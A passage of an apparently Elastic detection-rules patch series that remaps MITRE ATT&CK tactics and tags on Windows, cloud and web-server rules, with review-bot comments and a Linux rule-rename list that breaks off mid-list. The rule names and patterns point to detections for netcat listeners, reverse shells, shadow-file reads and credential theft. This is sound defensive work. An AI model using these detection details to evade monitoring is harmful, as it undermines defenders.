@@ -24,15 +24,7 @@ references = [ risk_score = 21 rule_id = "e74d645b-fec6-431e-bf93-ca64a538e0de" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "eql" @@ -78,31 +70,31 @@ process where event.type == "start" and host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1505" name = "Server Software Component" reference = "https://attack.mitre.org/techniques/T1505/" + [[rule.threat.technique.subtechnique]] id = "T1505.001" name = "SQL Stored Procedures" reference = "https://attack.mitre.org/techniques/T1505/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/lateral_movement_wmic_remote.toml b/rules_building_block/lateral_movement_wmic_remote.toml index 75ac81fc7f1..79969f690ec 100644 --- a/rules_building_block/lateral_movement_wmic_remote.toml +++ b/rules_building_block/lateral_movement_wmic_remote.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/08/24" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -26,17 +26,7 @@ name = "WMIC Remote Command" risk_score = 21 rule_id = "f59668de-caa0-4b84-94c1-3a1549e1e798" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Rule Type: BBR", - "Data Source: Sysmon", - "Data Source: Elastic Endgame", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Sysmon", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" 
@@ -51,31 +41,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.006" -name = "Windows Remote Management" -reference = "https://attack.mitre.org/techniques/T1021/006/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml b/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml index f4aaaef461d..eed1c2780d2 100644 --- a/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml +++ b/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/04/30" integration = ["aws"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -43,29 +43,18 @@ event.dataset: aws.cloudtrail and event.provider: "iam.amazonaws.com" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/persistence_github_new_pat_for_user.toml b/rules_building_block/persistence_github_new_pat_for_user.toml index a65b0128137..74a5af6d46e 100644 --- a/rules_building_block/persistence_github_new_pat_for_user.toml +++ b/rules_building_block/persistence_github_new_pat_for_user.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -17,14 +17,7 @@ name = "First Occurrence of Personal Access Token (PAT) Use For a GitHub User" risk_score = 21 rule_id = "f94e898e-94f1-4545-8923-03e4b2866211" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Use Case: UEBA", - "Tactic: Persistence", - "Rule Type: BBR", - "Data Source: Github", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Defense Evasion", "Data Source: Github"] timestamp_override = "event.ingested" type = "new_terms" @@ -37,22 +30,21 @@ github.programmatic_access_type:("OAuth access token" or "Fine-grained personal [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["user.name", "github.hashed_token"] diff --git a/rules_building_block/persistence_github_new_user_added_to_organization.toml b/rules_building_block/persistence_github_new_user_added_to_organization.toml index ebf6de67223..0afb472c332 100644 --- a/rules_building_block/persistence_github_new_user_added_to_organization.toml +++ b/rules_building_block/persistence_github_new_user_added_to_organization.toml 
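Review bot: After this hunk the rule maps only to TA0005 Defense Evasion, yet the file keeps its `persistence_` name prefix, and the `Tactic: Persistence` tag that the previous hunk removes was the only thing that prefix reflected; the same mismatch appears in privilege_escalation_sts_getsessiontoken_abuse.toml, which drops its Privilege Escalation entry and keeps only Defense Evasion. A later patch in this series renames rules under rules/linux by tactic, but as far as visible here neither of these rules_building_block files is renamed. Either rename them to a `defense_evasion_` prefix in the same series or state why the old prefix is kept. Separately, the new `"Tactic: Defense Evasion"` tag lands after `"Rule Type: BBR"` whereas the removed tag sat before it, so the relative order of tactic and rule-type tags now differs between files touched by this patch.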
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -35,19 +35,18 @@ configuration where event.dataset == "github.audit" and event.action == "org.add [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/persistence_iam_instance_request_to_iam_service.toml b/rules_building_block/persistence_iam_instance_request_to_iam_service.toml index e4a2ed6fd5e..79e94ce2457 100644 --- a/rules_building_block/persistence_iam_instance_request_to_iam_service.toml +++ b/rules_building_block/persistence_iam_instance_request_to_iam_service.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/07/24" integration = ["aws"] maturity = "production" -updated_date = "2024/11/07" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -84,20 +84,12 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" @@ -108,17 +100,30 @@ id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules_building_block/persistence_startup_folder_lnk.toml b/rules_building_block/persistence_startup_folder_lnk.toml index 0cfb8ff93eb..ac4429fcf95 100644 --- a/rules_building_block/persistence_startup_folder_lnk.toml +++ b/rules_building_block/persistence_startup_folder_lnk.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/29" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -48,24 +48,18 @@ file where host.os.type == "windows" and event.type != "deletion" and file.exten [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" -[[rule.threat.technique.subtechnique]] -id = "T1547.009" -name = "Shortcut Modification" -reference = "https://attack.mitre.org/techniques/T1547/009/" - - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/persistence_transport_agent_exchange.toml b/rules_building_block/persistence_transport_agent_exchange.toml index cbc31115a3e..d5f3bc49190 100644 --- a/rules_building_block/persistence_transport_agent_exchange.toml +++ b/rules_building_block/persistence_transport_agent_exchange.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
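Review bot: Dropping the T1547.009 (Shortcut Modification) subtechnique is the only content change in this hunk besides whitespace, and nothing in the hunk says why. The rule's query starts outside the hunk (the hunk header shows it matching `file` events filtered on extension), so if the detection is about shortcut files landing in a startup folder, T1547.001 describes the location while T1547.009 described the artifact; confirm the narrowing is intended rather than a side effect of normalising the threat blocks. A one-line reason in the commit description would make this traceable later.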
@@ -84,36 +84,18 @@ case_insensitive = true value = "?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*\\\\tmp_????????.???\\\\tmp_????????.???.ps?1" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1505" name = "Server Software Component" reference = "https://attack.mitre.org/techniques/T1505/" + [[rule.threat.technique.subtechnique]] id = "T1505.002" name = "Transport Agent" reference = "https://attack.mitre.org/techniques/T1505/002/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/persistence_web_server_potential_sql_injection.toml b/rules_building_block/persistence_web_server_potential_sql_injection.toml index a6611cbeb3b..93d46c613b7 100644 --- a/rules_building_block/persistence_web_server_potential_sql_injection.toml +++ b/rules_building_block/persistence_web_server_potential_sql_injection.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/11/19" integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" -updated_date = "2026/03/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
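Review bot: The whole Execution threat entry (T1059.001 under TA0002) is removed here, but no tags hunk for this file appears in the patch, so the rule's `tags` array is untouched. If it still lists `Tactic: Execution`, that tag becomes an orphan with no matching threat entry, which a tags-versus-threat consistency check would flag; if it never did, the old threat entry was the inconsistent half and the removal is the right fix — either way the outcome is not visible from this hunk. Note also that the `.ps?1` path pattern in the hunk's leading context still targets PowerShell script files, so a reader may expect the PowerShell mapping; a sentence in the commit message explaining why only the Transport Agent mapping is kept would help.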
@@ -28,21 +28,7 @@ name = "Web Server Potential SQL Injection Request" risk_score = 21 rule_id = "7f7a0ee1-7b6f-466a-85b4-110fb105f5e2" severity = "low" -tags = [ - "Domain: Web", - "Use Case: Threat Detection", - "Tactic: Reconnaissance", - "Tactic: Credential Access", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: Nginx", - "Data Source: Apache", - "Data Source: Apache Tomcat", - "Data Source: IIS", - "Data Source: Traefik", - "Rule Type: BBR", -] +tags = ["Domain: Web", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Reconnaissance", "Data Source: Nginx", "Data Source: Apache", "Data Source: Apache Tomcat", "Data Source: IIS", "Data Source: Traefik", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -62,45 +48,14 @@ any where url.original like~ ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -115,11 +70,6 @@ id = "T1595.002" name = "Vulnerability Scanning" reference = "https://attack.mitre.org/techniques/T1595/002/" -[[rule.threat.technique.subtechnique]] -id = "T1595.003" -name = "Wordlist Scanning" -reference = "https://attack.mitre.org/techniques/T1595/003/" - [rule.threat.tactic] id = "TA0043" name = "Reconnaissance" diff --git a/rules_building_block/persistence_web_server_sus_file_creation.toml b/rules_building_block/persistence_web_server_sus_file_creation.toml index 3141a9913dc..681676e92cf 100644 --- a/rules_building_block/persistence_web_server_sus_file_creation.toml 
+++ b/rules_building_block/persistence_web_server_sus_file_creation.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/03/06" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -47,16 +47,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "esql" @@ -129,34 +120,3 @@ reference = "https://attack.mitre.org/techniques/T1505/003/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" 
diff --git a/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml b/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml index 39bc5a78dcd..619231cfd90 100644 --- a/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml +++ b/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2021/05/17" integration = ["aws"] maturity = "production" -updated_date = "2025/11/03" +updated_date = "2026/03/23" [rule] author = ["Austin Songer", "Elastic"] @@ -68,17 +68,7 @@ references = ["https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessio risk_score = 21 rule_id = "b45ab1d2-712f-4f01-a751-df3826969807" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS STS", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", - "Rule Type: BBR", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS STS", "Use Case: Identity and Access Audit", "Resources: Investigation Guide", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "query" 
@@ -92,34 +82,21 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", From 9ae86ae3b410aa5c5a8b2df2a5f770fdb10bae26 Mon Sep 17 00:00:00 2001 
From: Ruben Groenewoud Date: Tue, 24 Mar 2026 10:39:18 +0100 Subject: [PATCH 04/16] __ --- ...b_process_hooking.toml => collection_gdb_process_hooking.toml} | 0 ...se_dumping.toml => collection_potential_database_dumping.toml} | 0 ...ction_sensitive_files.toml => collection_sensitive_files.toml} | 0 ... collection_sensitive_files_compression_inside_container.toml} | 0 ...nd_control_cupsd_foomatic_rip_suspicious_child_execution.toml} | 0 ... => command_and_control_curl_or_wget_executed_via_lolbin.toml} | 0 ...d_control_egress_connection_from_entrypoint_in_container.toml} | 0 ... command_and_control_file_execution_followed_by_deletion.toml} | 0 ...control_file_transfer_or_listener_established_via_netcat.toml} | 0 ..._hook_netcon.toml => command_and_control_git_hook_netcon.toml} | 0 ...lwrap.toml => command_and_control_nc_listener_via_rlwrap.toml} | 0 ...ml => command_and_control_network_event_post_compilation.toml} | 0 ..._control_pluggable_authentication_module_source_download.toml} | 0 ...ml => command_and_control_shell_openssl_client_or_server.toml} | 0 ...toml => command_and_control_shell_via_background_process.toml} | 0 ...=> command_and_control_shell_via_child_tcp_utility_linux.toml} | 0 ...> command_and_control_shell_via_lolbin_interpreter_linux.toml} | 0 ....toml => command_and_control_shell_via_suspicious_binary.toml} | 0 ...l => command_and_control_shell_via_tcp_cli_utility_linux.toml} | 0 ...l => command_and_control_shell_via_udp_cli_utility_linux.toml} | 0 ...ommand_and_control_simple_web_server_connection_accepted.toml} | 0 ...ownload.toml => command_and_control_ssh_it_worm_download.toml} | 0 ...ystemd_netcon.toml => command_and_control_systemd_netcon.toml} | 0 ... 
=> command_and_control_telnet_network_activity_external.toml} | 0 ...l => command_and_control_web_server_sus_destination_port.toml} | 0 ...ac_permissions.toml => credential_access_dac_permissions.toml} | 0 ...ivity.toml => credential_access_kubeconfig_file_activity.toml} | 0 ...very.toml => credential_access_kubeconfig_file_discovery.toml} | 0 ...al_access_kubernetes_direct_api_request_via_curl_or_wget.toml} | 0 ...h_binaries.toml => credential_access_modify_ssh_binaries.toml} | 0 ...edential_access_pluggable_authentication_module_creation.toml} | 0 ..._pluggable_authentication_module_creation_in_unusual_dir.toml} | 0 ...credential_access_potential_bruteforce_malware_infection.toml} | 0 ...d.toml => credential_access_potential_hack_tool_executed.toml} | 0 ...redential_access_private_key_password_searching_activity.toml} | 0 ...redential_access_security_file_access_via_common_utility.toml} | 0 ...dow_file_read.toml => credential_access_shadow_file_read.toml} | 0 ...access_suspicious_network_tool_launched_inside_container.toml} | 0 ...toml => defense_evasion_abnormal_process_id_file_created.toml} | 0 ...ce_boot_file_copy.toml => defense_evasion_boot_file_copy.toml} | 0 ..._write_user.toml => defense_evasion_bpf_probe_write_user.toml} | 0 ...map_load.toml => defense_evasion_bpf_program_or_map_load.toml} | 0 ...ml => defense_evasion_chown_chmod_unauthorized_file_read.toml} | 0 ..._evasion_file_made_executable_via_chmod_inside_container.toml} | 0 ...e_load.toml => defense_evasion_insmod_kernel_module_load.toml} | 0 ...l_driver_load.toml => defense_evasion_kernel_driver_load.toml} | 0 ...t.toml => defense_evasion_kernel_driver_load_by_non_root.toml} | 0 ...defense_evasion_kernel_module_load_from_unusual_location.toml} | 0 ...e_creation.toml => defense_evasion_kworker_file_creation.toml} | 0 ..._elevation.toml => defense_evasion_kworker_uid_elevation.toml} | 0 ...rker_netcon.toml => defense_evasion_linux_kworker_netcon.toml} | 0 ...l => 
defense_evasion_load_and_unload_of_kernel_via_kexec.toml} | 0 ...oml => defense_evasion_netcon_from_rwx_mem_region_binary.toml} | 0 ...> defense_evasion_process_backgrounded_by_unusual_parent.toml} | 0 ... => defense_evasion_process_started_from_process_id_file.toml} | 0 ...fense_evasion_process_started_in_shared_memory_directory.toml} | 0 ...non_root.toml => defense_evasion_sda_disk_mount_non_root.toml} | 0 ..._creation.toml => defense_evasion_shared_object_creation.toml} | 0 ...inary.toml => defense_evasion_shell_evasion_linux_binary.toml} | 0 ...ense_evasion_sus_extraction_or_decrompression_via_funzip.toml} | 0 ...oml => defense_evasion_suspicious_chown_fowner_elevation.toml} | 0 ... => defense_evasion_system_binary_file_permission_change.toml} | 0 ...tion_tc_bpf_filter.toml => defense_evasion_tc_bpf_filter.toml} | 0 ...ution.toml => defense_evasion_unusual_kthreadd_execution.toml} | 0 ..._pam_grantor.toml => defense_evasion_unusual_pam_grantor.toml} | 0 ...efense_evasion_unusual_path_invocation_from_command_line.toml} | 0 ...g.toml => defense_evasion_virtual_machine_fingerprinting.toml} | 0 ...eter_linux.toml => discovery_shell_via_meterpreter_linux.toml} | 0 ... 
discovery_suspicious_executable_running_system_commands.toml} | 0 ...xecution.toml => execution_apt_package_manager_execution.toml} | 0 ...ager_netcon.toml => execution_apt_package_manager_netcon.toml} | 0 ...stence_at_job_creation.toml => execution_at_job_creation.toml} | 0 ...ce_cron_job_creation.toml => execution_cron_job_creation.toml} | 0 ...c_rip_netcon.toml => execution_cupsd_foomatic_rip_netcon.toml} | 0 ...on.toml => execution_dbus_unsual_daemon_parent_execution.toml} | 0 ..._git_hook_execution.toml => execution_git_hook_execution.toml} | 0 ...s_execution.toml => execution_git_hook_process_execution.toml} | 0 ...ser.toml => execution_interactive_shell_from_system_user.toml} | 0 ...l_spawn.toml => execution_potential_wildcard_shell_spawn.toml} | 0 ...or.toml => execution_suspicious_ssh_execution_xzbackdoor.toml} | 0 ...ervice_started.toml => execution_systemd_service_started.toml} | 0 ...hell_execution.toml => execution_systemd_shell_execution.toml} | 0 ...ld_process.toml => execution_unusual_exim4_child_process.toml} | 0 ...d_spawned.toml => execution_web_server_sus_child_spawned.toml} | 0 ...ution.toml => execution_web_server_sus_command_execution.toml} | 0 ...n.toml => execution_web_server_unusual_command_execution.toml} | 0 ...le_deletion.toml => impact_authorized_keys_file_deletion.toml} | 0 ...asion_rename_esxi_files.toml => impact_rename_esxi_files.toml} | 0 ...toml => impact_suspicious_mining_process_creation_events.toml} | 0 ..._or_group_deletion.toml => impact_user_or_group_deletion.toml} | 0 ...ml => initial_access_linux_shell_activity_via_web_server.toml} | 0 ...k.toml => initial_access_potential_bufferoverflow_attack.toml} | 0 ...er.toml => initial_access_ssh_via_backdoored_system_user.toml} | 0 ...cess.toml => lateral_movement_unusual_sshd_child_process.toml} | 0 ...modif.toml => persistence_ld_preload_shared_object_modif.toml} | 0 ...vasion_ld_so_creation.toml => persistence_ld_so_creation.toml} | 0 ..._link.toml => 
persistence_linux_suspicious_symbolic_link.toml} | 0 ...lation_sudo_hijacking.toml => persistence_sudo_hijacking.toml} | 0 ...e_write.toml => persistence_suspicious_passwd_file_write.toml} | 0 ...> privilege_escalation_process_capability_set_via_setcap.toml} | 0 ...oml => privilege_escalation_setuid_setgid_capability_set.toml} | 0 ...on.toml => privilege_escalation_unusual_pkexec_execution.toml} | 0 102 files changed, 0 insertions(+), 0 deletions(-) rename rules/linux/{credential_access_gdb_process_hooking.toml => collection_gdb_process_hooking.toml} (100%) rename rules/linux/{exfiltration_potential_database_dumping.toml => collection_potential_database_dumping.toml} (100%) rename rules/linux/{credential_access_collection_sensitive_files.toml => collection_sensitive_files.toml} (100%) rename rules/linux/{credential_access_collection_sensitive_files_compression_inside_container.toml => collection_sensitive_files_compression_inside_container.toml} (100%) rename rules/linux/{execution_cupsd_foomatic_rip_suspicious_child_execution.toml => command_and_control_cupsd_foomatic_rip_suspicious_child_execution.toml} (100%) rename rules/linux/{defense_evasion_curl_or_wget_executed_via_lolbin.toml => command_and_control_curl_or_wget_executed_via_lolbin.toml} (100%) rename rules/linux/{execution_egress_connection_from_entrypoint_in_container.toml => command_and_control_egress_connection_from_entrypoint_in_container.toml} (100%) rename rules/linux/{execution_file_execution_followed_by_deletion.toml => command_and_control_file_execution_followed_by_deletion.toml} (100%) rename rules/linux/{execution_file_transfer_or_listener_established_via_netcat.toml => command_and_control_file_transfer_or_listener_established_via_netcat.toml} (100%) rename rules/linux/{persistence_git_hook_netcon.toml => command_and_control_git_hook_netcon.toml} (100%) rename rules/linux/{execution_nc_listener_via_rlwrap.toml => command_and_control_nc_listener_via_rlwrap.toml} (100%) rename 
